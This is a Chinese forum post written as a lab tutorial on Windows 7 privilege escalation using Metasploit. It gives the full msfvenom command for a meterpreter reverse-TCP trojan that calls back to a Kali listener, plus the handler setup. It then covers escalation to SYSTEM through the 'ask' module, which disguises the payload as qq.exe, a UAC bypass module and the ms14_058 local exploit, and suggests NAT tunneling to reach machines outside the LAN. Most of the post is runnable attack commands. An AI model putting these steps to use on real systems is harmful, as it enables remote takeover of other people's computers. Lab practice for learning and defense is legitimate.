本帖最后由 zhaorong 于 2021-1-9 17:29 编辑
1.
刚和对象分手,吃完一碗泡面,就来和各位表哥们吹牛皮了,因为表哥们比对象重要哈哈哈哈;
别喷弟弟,由于实验实在本地进行,所以需要各位看官搭建环境。
2.
实验材料|:
1.win7x64虚拟机一台
2.kali一台
3.接下来全靠吹牛皮
3.
在我们拿到一个低权限的shell之后,我们需要提权,所以此篇文章就是针对这种情况的屁话不多
搭建好两台虚拟机之后就可以开始了。
3.1直接提权
我们首先需要制作一个马,先查看kali的ip,我这里是192.168.199.129
使用msfVENOM制作一个马,使用刚刚得到的ip,输入命令
msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_tcp lhost=192.168.199.129
lport=4444 -f exe x> shell.exe
我解读一下使用msfvenom,制作x64位的win木马,使用windows/x64/meterpreter_reverse_tcp模块
监听主机为192.168.199.129,监听端口为4444.输出格式为exe可执行文件
输出名字为shell.exe,各位表哥看着输入命令
可以看到木马制作成功,接下来就是发送给靶机运行即可。
注:
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序
并在目标机上执行,在本地监听上线4
使用msfcosole,命令
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.199.129
set lport 4444
exploit
可以看到成功监听。接下来靶机运行之前生成的木马即可拿到shell
已经可以看到sessions了,成功拿到shell,但是此时我们仅仅只是一个管理员权限 我们当然需要system权限
3.1.1
此时进入我们的exploit/windows/local/ask来提权,
输入命令use exploit/windows/local/ask进入该模块,此时只有一个sessions id为1
使用命令 set session 1
set filename qq.exe
exploit
(此时uac会在win7弹出一个窗口,我们选择是)
即可看到成功获取system,此时我们进入shell 输入whoami 成功拿到system权限
这种提权方式是提高程序运行级别来提高权限。
注意:以上过程需要kali和win7处在同一个局域网中如果不在一个局域网
就需要内网穿透内网穿透简单来说就是将
内网外网通过natapp隧道打通,让内网的数据让外网可以获取
3.1.2
绕过uac提权
我们需要使用use exploit/windows/local/bypassuac模块来绕过uac策略
使用background返回到msf
命令:background
use exploit/windows/local/bypassuac
sessions
set session 6
exploit即可成功
输入sessions即可看到重新生成了许多session,此时我们只需要选择一个session进入会话getsystem即可。
这种提权方法比第一种更好,没有与用户交互的过程,当用户有
一定安全基础时第一种方法可能会失效
3.1.3
使用提权漏洞进行提权,先讲之前的session全部清空
留下一个admin权限的session
因为windows本地提权漏洞挺多的,所以我选择一个来举例子,其实都可以去试一下
首先进入exploit/windows/local/ms14_058_track_popup_menu模块
输入命令set session 1
exploit
即可执行直接获取system的session |
